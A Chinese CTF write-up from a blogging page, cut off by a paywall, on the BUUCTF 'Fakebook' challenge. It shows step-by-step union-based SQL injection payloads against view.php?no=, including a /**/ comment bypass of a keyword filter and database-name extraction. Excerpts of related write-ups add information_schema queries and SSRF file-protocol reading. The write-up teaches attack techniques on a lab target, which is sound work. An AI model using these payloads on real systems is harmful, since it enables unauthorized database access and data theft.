BUUCTF——[网鼎杯 2018]Fakebook

于 2024-04-24 17:24:28 发布
阅读量1.5k 收藏 9
点赞数 8
CC 4.0 BY-SA版权
分类专栏: 信息安全 Web安全 Buuctf 文章标签: 数据库 php 网络安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m_de_g/article/details/138164004

BUUCTF——[网鼎杯 2018]Fakebook

1.测试SQl注入的注入点1'
在这里插入图片描述

2.尝试使用-- -进行闭合,但是不行
在这里插入图片描述
3.尝试使用数字型的SQL注入,使用--+进行注入后面的SQL语句

在这里插入图片描述

4.尝试使用and 1=1 判断其是否真的存在SQL注入

在这里插入图片描述

5.尝试使用and 1=2进行判断
在这里插入图片描述

6.发现这个地方确实存在SQL注入,接下来判断列名

?no=1 order by 4--+

在这里插入图片描述

7.再使用5判断其列名,报错啦,说明有4

?no=1 order by 5--+

在这里插入图片描述

8.判断回显的位置

?no=-1 union select 1,2,3,4--+

在这里插入图片描述

9.发现存在过滤,尝试使用内联注入(/**/)进行绕过

?no=-1/**/union/**/select/**/1,2,3,4--+

在这里插入图片描述

10.发现回显位在2上,爆破数据库库名

?no=-1/**/union/**/select/**/1,database(),3,4--+

在这里插入图片描述

11.数据库名为fakebook,接下来爆破数据表名,尝试第一张表


                

                
                
        

    

    
  


        

            

                      
                        最低0.47元/天 解锁文章
                        

                          
200万优质内容无限畅学

                          
                        

                      
            

        


    



                



	

		

			

				
					
网络安全 | CTF】fakebook2018)解题详析

				
			

			

				

					等风来
				

				

					07-24
					
					1万+
					
				

			

		

		

			
				
登录后发现传参,构造字符型参数,回显error判断为数字型注入,查看注入点数目:由上下两张图可知注入点数目为4经测试可知对空格进行过滤,可通过/**/或+绕过,但程序也过滤了+,因此使用前者no改为0的原因是使程序报错,从而回显库名fakebookno=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users')

			
		

	



                

            
              



	

		

			

				
					
[BUUCTF][ 2018]Fakebook

				
			

			

				

					朋克归零膏的博客
				

				

					10-25
					
					1046
					
				

			

		

		

			
				
BUUCTF限制了请求速率,所以扫描工具不太好使,但是字典数量巨大,因此有些文件路径是真的不太好扫出来的🥶。

			
		

	



              


  
              

                


	

		

			

				
					
[ 2018]Fakebook 1

				
			

			

				

					bazzza的博客
				

				

					12-20
					
					1285
					
				

			

		

		

			
				
先注册一个账号看看,发现对blog有过滤,注册完登录进去发现界面是这样的,

可以看到页面下方打开了我们注册的blog,可以大胆的推测他可以进行ssrf,但是blog在注册时是经过过滤的,只能是固定的格式,看起来是难以利用的。
然后,我看别人的wp,对目录扫描后可直接扫描出来robots.txt和flag.php,我自己也扫了一下,

https://blog.csdn.net/weixin_43940853/article/details/105081522


...

			
		

	





	

		

			

				
					
BUUCTF-[ 2018]Fakebook

				
			

			

				

					qq_43006864的博客
				

				

					04-20
					
					1847
					
				

			

		

		

			
				
打开题目



点击login,一个登陆界面。没啥发现。



点击join。注册一个账号看看。





这里可以看到:http://46021289-6e25-4fee-b4db-f69979ef4362.node4.buuoj.cn:81/view.php?no=1



盲猜可以sql注入。测试了一下,貌似还不需要闭合,直接接语句就可以。













测试出来字段为4,开始尝试获取数据库信息。





貌似有waf,尝试使用/**/绕过。







成功绕过,并且发现注入点...

			
		

	



		

			
		



	

		

			

				
					
[ 2018]Fakebook

				
			

			

				

					Yang_99的博客
				

				

					08-04
					
					1358
					
				

			

		

		

			
				
1.进去先随便注册一个账号,这里注意blog是有限制的,必须http开头。2.点1进去发现url中no存在sql注入,注入发现union被过滤,不过可以使用/**/绕过。可以使用报错注入0/**/union/**/select 1,2,3,4#
根据报错信息可以知道站的储存目录,以及数据库里的数据都是以序列化方式储存。因此只要访问/var/www/html/flag.php就可以拿到flag,但通过http(s)协议无法读到flag,curl不仅支持http(s),还支持file协议,所以可以通过file

			
		

	





	

		

			

				
					
BUUCTF[2018]Fakebook

				
			

			

				

					weixin_45253622的博客
				

				

					05-22
					
					792
					
				

			

		

		

			
				
我们注册一个账号看看:



注册成功如下:



这里需要注意,王小帥是可以点击的,url变为:http://df1a9115-0e1d-43b2-97e0-2d5ba843acf8.node3.buuoj.cn/view.php?no=1我们试试sql注入;

payload:http://df1a9115-0e1d-43b2-97e0-2d5ba843acf8.node3.buuoj.cn/view.php?no=1'















没什么卵用,我们访问ro...

			
		

	





	

		

			

				
					
buuctf-[ 2018]Fakebook

				
			

			

				

					qq_42728977的博客
				

				

					12-17
					
					1248
					
				

			

		

		

			
				
[ 2018]Fakebook考点复现法1,load_file()法2,纯sql注入总结参考
考点
sql注入
复现
法1,load_file()
注册登陆之后
http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0

可能存在注入点,尝试,发现确实有
http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0 un

			
		

	





	

		

			

				
					
题解:BUUCTF [ 2018]Fakebook 1

				
			

			

				

					qq_62886656的博客
				

				

					06-14
					
					805
					
				

			

		

		

			
				
题解

			
		

	





	

		

			

				
					
[ 2018]Fakebook——SSRF/反序列化漏洞/SQL注入

				
			

			

				

					sGanYu
				

				

					09-29
					
					4323
					
				

			

		

		

			
				
解法一



解法二



解法三

考点

• 目录扫描

• SSRF

• SQL注入

• PHP反序列化


前言:当我们拿到站的时候,首先需要对这个站进行信息收集,扩大漏洞发现的概率,比如whois、指纹识别、扫描目标站点的目录,寻找敏感信息、后台又或者是否存在备份文件,其实靶场也一样,如果觉得麻烦,也可能错过发现一个可利用的漏洞






开始之前,先扫描一下该站下目录,查看有什么敏感信息泄露





直接扫出了flag.php文件,有是有,但是访问后,回显内容为空,当我们确定了一个

			
		

	





	

		

			

				
					
BUUCTF__[ 2018]Fakebook_题解

				
			

			

				

					风过江南乱的博客
				

				

					07-04
					
					2257
					
				

			

		

		

			
				
BUUCTF__[ 2018]Fakebook_题解

			
		

	





	

		

			

				
					
fakebook

					
最新发布

				
			

			

				

					03-25
				

			

		

		

			
				
好的,用户提到Fakebook,看起来可能与CTF题目有关,特别是2018的题目。用户引用了多个涉及SQL注入、PHP反序列化和SSRF的内容。首先,我需要整理这些引用中的关键点。  首先,引用[2]和[3]指出存在SQL注入点,...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 4

	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值